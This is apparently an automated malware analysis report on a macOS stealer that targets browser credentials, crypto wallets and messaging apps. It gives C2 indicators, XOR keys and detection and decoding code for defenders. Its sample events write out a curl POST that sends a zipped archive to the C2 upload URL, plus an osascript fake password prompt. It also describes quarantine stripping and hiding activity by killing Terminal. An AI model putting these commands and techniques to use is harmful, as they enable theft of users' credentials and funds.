
Malware Analysis Report

MALICIOUS — 27/68 Engines
Sample ID
8ea963c0-0a81-4984-ac42-a7438e8fbad8
SHA-256
998c38b430097479b015a68d9435dc5b98684119739572a4dff11e085881187e
Analysis Date
2026-02-28 03:18 UTC
Sample Type
Mach-O Binary (macOS)

Executive Summary

This sample is a macOS information stealer flagged by 27 of 68 antivirus engines. It reports to command-and-control infrastructure at socifiapp.com and exfiltrates collected data over HTTPS (port 443) with a curl POST to /api/reports/upload. Analysis recovered 14 XOR keys used to obfuscate strings and an embedded configuration blob (the principal keys are listed below), together with 66 strings of interest that expose credential harvesting from Chrome, Opera and Yandex browsers and their extensions, theft of cryptocurrency wallet and messaging-app data, and a document grabber. The combination of obfuscated strings, a structured upload API, and broad target coverage indicates a mature, actively maintained stealer toolkit built for macOS.

Indicators of Compromise

C2 Infrastructure

  • socifiapp.com — Primary C2 domain; the strongest single indicator HIGH
  • https://socifiapp.com — Main C2 server URL, recovered by decrypting the rolling-XOR config blob HIGH
  • https://socifiapp.com/api/reports/upload — Full exfiltration URL, sent as a curl POST HIGH
  • /api/reports/upload — Exfiltration URI path (rated HIGH here; the path is generic enough that it should be matched together with the domain rather than alone) HIGH
  • 443 — HTTPS port (standard port, not a discriminating indicator by itself; use it only to scope the host match) MEDIUM

XOR Keys

  • cefdf545d98403c5bf865e409e7499c6 — Primary XOR key (16 bytes)
  • c39b9c8b0f22a7ef — Extended key word 3
  • 6bb78a3eb3c051e8 — Extended key word 4
  • c9100bc4952b4dbb — Rolling XOR key (64-bit, rotated one bit per byte; see the reasoning trail)
  • badd9120b5ed6283 / e1848724abe66a89 / ad9cd524ade567b1 — Additional 64-bit key words (role not attributed in this report)

Keys are shown as hex. The report does not state whether the binary applies them as raw bytes or as ASCII text, nor the byte order of the 64-bit words, so check both interpretations when re-implementing the decoder.

Notable Strings

  • killall Terminal — Anti-forensics; passed to system() to close the Terminal session the payload was launched from, hiding the running script and its output
  • curl -X POST — Exfiltration method (HTTPS upload of the collected archive)
  • osascript -e — AppleScript dialog used to phish the user's password
  • jhzhhfomng — Campaign / bot ID, recovered from the config blob
  • ditto -c -k --sequesterRsrc — ZIP compression of the collected data for exfil (PKZip format, with resource forks stored separately in __MACOSX)
  • xattr -c — Clear extended attributes; this strips com.apple.quarantine so dropped files do not trigger the Gatekeeper prompt

Targeted Applications

  • Google/Chrome, Opera, Yandex — Browser credentials and extension data
  • Telegram Desktop, Discord — Messaging data
  • Bitcoin, Litecoin, Exodus, Atomic, Monero, Dogecoin, Binance, Ledger, Trezor — Crypto wallets
  • Apple Notes — Local notes data
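The indicators and notable strings above translate directly into detection logic. The following is an added example, not part of the report or the analysis pipeline: it scans process-execution events for the C2 host and upload path, and separately counts how many distinct stages of the stealer's command chain (xattr -c, osascript password prompt, ditto archive, curl POST, killall Terminal) run under one parent process. The events are constructed for the example; the multipart form upload, the user_id value, and the dialog text in the osascript command are assumptions, since the page only names the parameters and commands, not their exact arguments.

```python
import re
from collections import defaultdict

# Network indicators from the report.
C2_HOST = "socifiapp.com"
C2_PATH = "/api/reports/upload"

# Behavioural stages taken from the report's notable strings. The osascript
# rule keys on "hidden answer", the AppleScript idiom for a password field;
# the dialog text itself is not on the page and is assumed in the sample.
STAGES = {
    "quarantine_strip": re.compile(r"\bxattr\s+-c\b"),
    "password_prompt":  re.compile(r"\bosascript\s+-e\b.*hidden answer"),
    "archive_loot":     re.compile(r"\bditto\s+-c\s+-k\s+--sequesterRsrc\b"),
    "exfil_post":       re.compile(r"\bcurl\b.*\s-X\s+POST\b"),
    "kill_terminal":    re.compile(r"\bkillall\s+Terminal\b"),
}

# Constructed process-execution events (not from the report), one dict per
# exec, in the shape an EDR or unified-log export typically provides.
# The last two are benign look-alikes that should not raise a chain alert.
EVENTS = [
    {"pid": 4021, "parent": "Installer", "cmdline": "xattr -c /Users/demo/Downloads/Setup"},
    {"pid": 4022, "parent": "Setup", "cmdline": "osascript -e 'display dialog \"System Settings needs your password\" default answer \"\" with hidden answer'"},
    {"pid": 4023, "parent": "Setup", "cmdline": "ditto -c -k --sequesterRsrc /tmp/out /tmp/out.zip"},
    {"pid": 4024, "parent": "Setup", "cmdline": "curl -X POST -F user_id=1234 -F build_tag=jhzhhfomng -F report_file=@/tmp/out.zip https://socifiapp.com/api/reports/upload"},
    {"pid": 4025, "parent": "Setup", "cmdline": "killall Terminal"},
    {"pid": 5001, "parent": "Terminal", "cmdline": "curl -X POST https://example.org/api/reports/upload -d x=1"},
    {"pid": 5002, "parent": "Terminal", "cmdline": "xattr -c ./README.md"},
]


def network_findings(cmdline):
    """C2 indicators. The host is the strong signal; the upload path on
    its own is generic enough that it only rates medium without the host."""
    if C2_HOST in cmdline:
        return [("high", f"contact with C2 host {C2_HOST}")]
    if C2_PATH in cmdline:
        return [("medium", f"C2 upload path {C2_PATH} on a host other than {C2_HOST}")]
    return []


def scan(events, min_stages=3):
    """Return alerts: one per event carrying a network IOC, plus one per
    parent process that runs at least `min_stages` distinct chain stages."""
    alerts = []
    chain = defaultdict(dict)  # parent -> {stage: first pid seen}
    for ev in events:
        for severity, reason in network_findings(ev["cmdline"]):
            alerts.append({"pid": ev["pid"], "severity": severity, "reason": reason})
        for stage, rx in STAGES.items():
            if rx.search(ev["cmdline"]):
                chain[ev["parent"]].setdefault(stage, ev["pid"])
    for parent, seen in chain.items():
        if len(seen) >= min_stages:
            alerts.append({
                "parent": parent,
                "severity": "high",
                "reason": f"{len(seen)} stealer stages under one parent process",
                "stages": sorted(seen),
                "pids": sorted(seen.values()),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(EVENTS):
        print(alert)
```

With the default threshold of three stages, the "Setup" parent is flagged on four stages while the "Terminal" parent, which runs a curl POST and an xattr -c as ordinary user activity, is not; lowering `min_stages` to 2 would flag it too, which is the trade-off to tune against the environment's baseline.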

Analysis Reasoning Trail

Triage

Identified as a Mach-O binary (application/x-mach-binary). Flagged by 27 of 68 VirusTotal engines, so the sample was routed to deep analysis.

Iteration 1–2

Decompiled the entry point and found a massive function built around stack-based XOR decryption: immediates are written to stack slots and then XORed with a key. Identified the first ciphertext block and its key pair. The first decrypted string was killall Terminal, passed to system().

Iteration 3–5

Mapped callgraph revealing fork/setsid (daemonization), 19 popen() calls, filesystem operations, and crypto capabilities. Found 1591 stack immediate assignments and 3257 XOR operations. Began systematic extraction of encrypted string blocks.

Iteration 6–8

Identified 223 consecutive assignment blocks. Discovered a second obfuscation scheme: a rolling XOR in which an embedded 64-bit key is rotated right by one bit after each byte. Located the encrypted config blob (316 bytes).

Iteration 9–10

Decrypted the rolling XOR config blob, which revealed the C2 URL https://socifiapp.com, the campaign ID jhzhhfomng, the targeted file types, and the social engineering messages used for credential phishing.
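The rolling XOR described in Iterations 6 to 10 is simple enough to re-implement for re-analysis of future samples. The block below is an added example, not code from the report or the REActor pipeline. It assumes the report's rolling key c9100bc4952b4dbb is a big-endian 64-bit integer applied as raw bytes, that each plaintext byte is XORed with the low byte of the key before the key is rotated, and that "rotating right" means a 64-bit rotate; since a sample may differ in rotation direction, the decoder tries both and keeps whichever output is mostly printable. The 316-byte blob itself is not reproduced on the page, so the sample config here is constructed from the field values the report recovered.

```python
MASK64 = (1 << 64) - 1

# Rolling-XOR key from the report, read as a big-endian 64-bit integer.
# Assumption: the report gives the key as hex and does not state byte order.
ROLLING_KEY = int("c9100bc4952b4dbb", 16)


def ror64(x, n=1):
    return ((x >> n) | (x << (64 - n))) & MASK64


def rol64(x, n=1):
    return ((x << n) | (x >> (64 - n))) & MASK64


def rolling_xor(data, key=ROLLING_KEY, direction="ror"):
    """XOR each byte with the low byte of the key, then rotate the key one bit.
    The transform is its own inverse, so it both encrypts and decrypts."""
    rotate = ror64 if direction == "ror" else rol64
    out = bytearray()
    k = key
    for b in data:
        out.append(b ^ (k & 0xFF))
        k = rotate(k)
    return bytes(out)


def printable_ratio(buf):
    """Fraction of bytes that are NUL (field separator) or printable ASCII."""
    if not buf:
        return 0.0
    ok = sum(1 for b in buf if b == 0 or 0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D))
    return ok / len(buf)


def decrypt_config(blob, key=ROLLING_KEY):
    """Try both rotation directions, keep the one that yields the most text,
    and split the result into NUL-separated fields. Returns (direction, fields)."""
    candidates = [(d, rolling_xor(blob, key, d)) for d in ("ror", "rol")]
    direction, plain = max(candidates, key=lambda c: printable_ratio(c[1]))
    fields = [f.decode("ascii", "replace") for f in plain.split(b"\x00") if f]
    return direction, fields


# Constructed stand-in for the config blob: NUL-separated fields using the
# values the report recovered (C2 URL, campaign ID, document types) plus an
# assumed phishing message. The real blob's layout and text are not on the page.
SAMPLE_PLAINTEXT = (
    b"https://socifiapp.com\x00jhzhhfomng\x00pdf,txt,rtf\x00"
    b"macOS needs your password to continue\x00"
)
SAMPLE_CONFIG = rolling_xor(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    direction, fields = decrypt_config(SAMPLE_CONFIG)
    print(f"rotation: {direction}")
    for f in fields:
        print(f"  {f}")
```

When a candidate decrypt scores well below 1.0 in both directions, the key, the byte order, or the "low byte of the key" assumption is wrong for that sample and should be revisited before trusting any recovered strings.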

Iteration 11–16

Built a stack state machine to track key changes across the massive function, then decrypted 100+ strings revealing the full target list: crypto wallets (Bitcoin, Exodus, Atomic, Monero, etc.), browsers (Chrome, Opera, Yandex), messaging apps (Telegram, Discord), and a document grabber (pdf/txt/rtf).
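The stack state machine from Iterations 11 to 16 (and the first block-XOR decrypt in Iterations 1 and 2) can be illustrated with a small replay over a decompiler-style listing. This is an added example, not the report's tooling, and the listing is constructed: the page does not reproduce the real decompiler output, so the syntax (var_NN stack slots, keyN key registers, a call taking a slot address) is an assumption that only mimics the pattern the report describes. The ciphertext qwords were produced by XORing "killall Terminal" with the report's 16-byte primary key split into two little-endian 64-bit words, and "curl -X POST" with extended key word 3; the little-endian split is itself an assumption. The point of the replay is that the key register is overwritten mid-function, so each XOR must use whatever key value is live at that instruction, not the first key found.

```python
import re

# Constructed decompiler-style listing (see lead-in); not from the report.
# Stack slot var_NN denotes rbp-0xNN, so a buffer that starts at var_50
# continues in var_48, var_40, ... as addresses increase.
LISTING = """
var_50 = 0xe56fe8b8299994a5;
var_48 = 0xaaf81af72d2ce3eb;
var_40 = 0x0;
key0 = 0xc50384d945f5fdce;
key1 = 0xc699749e405e86bf;
var_50 ^= key0;
var_48 ^= key1;
system(&var_50);
var_30 = 0xcfff0f2fe7eeeea0;
var_28 = 0xefa7220fdfcfd493;
key0 = 0xefa7220f8b9c9bc3;
var_30 ^= key0;
var_28 ^= key0;
popen(&var_30);
"""

ASSIGN = re.compile(r"^(var_[0-9a-f]+)\s*=\s*0x([0-9a-f]+);$", re.I)
KEYSET = re.compile(r"^(key\d+)\s*=\s*0x([0-9a-f]+);$", re.I)
XORKEY = re.compile(r"^(var_[0-9a-f]+)\s*\^=\s*(key\d+);$", re.I)
CALL = re.compile(r"^(\w+)\(&(var_[0-9a-f]+)\);$")


def slot_offset(name):
    return int(name.split("_", 1)[1], 16)


def collect_buffer(slots, start):
    """Walk upward in memory from `start` (next qword lives in var_(NN-8))
    and return the NUL-terminated bytes of the buffer."""
    off = slot_offset(start)
    data = bytearray()
    while True:
        name = f"var_{off:x}"
        if name not in slots:
            break
        data += slots[name].to_bytes(8, "little")
        off -= 8
    return bytes(data).split(b"\x00", 1)[0]


def decode_listing(listing):
    """Replay the listing as a stack state machine. Slot immediates and key
    registers are tracked in order; a XOR applies the key value live at that
    point; every call that receives a slot address yields (callee, string)."""
    slots, keys, out = {}, {}, []
    for line in listing.strip().splitlines():
        line = line.strip()
        if m := ASSIGN.match(line):
            slots[m[1]] = int(m[2], 16)
        elif m := KEYSET.match(line):
            keys[m[1]] = int(m[2], 16)
        elif m := XORKEY.match(line):
            slots[m[1]] ^= keys[m[2]]
        elif m := CALL.match(line):
            text = collect_buffer(slots, m[2]).decode("ascii", "replace")
            out.append((m[1], text))
    return out


if __name__ == "__main__":
    for callee, s in decode_listing(LISTING):
        print(f"{callee}({s!r})")
```

On real decompiler output the slot widths vary (dword and qword stores mixed) and the key is often loaded into a register rather than a named variable, so the regexes need adapting per sample; the state-machine structure, tracking slots and live key values in program order and emitting at the consuming call, is what carries over.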

Iteration 17–20

Manually decrypted the C2 communication strings and reconstructed the full exfiltration command: a curl -X POST to /api/reports/upload carrying user_id, build_tag and report_file parameters. Finalized IOC extraction.

Report generated by REActor automated analysis pipeline.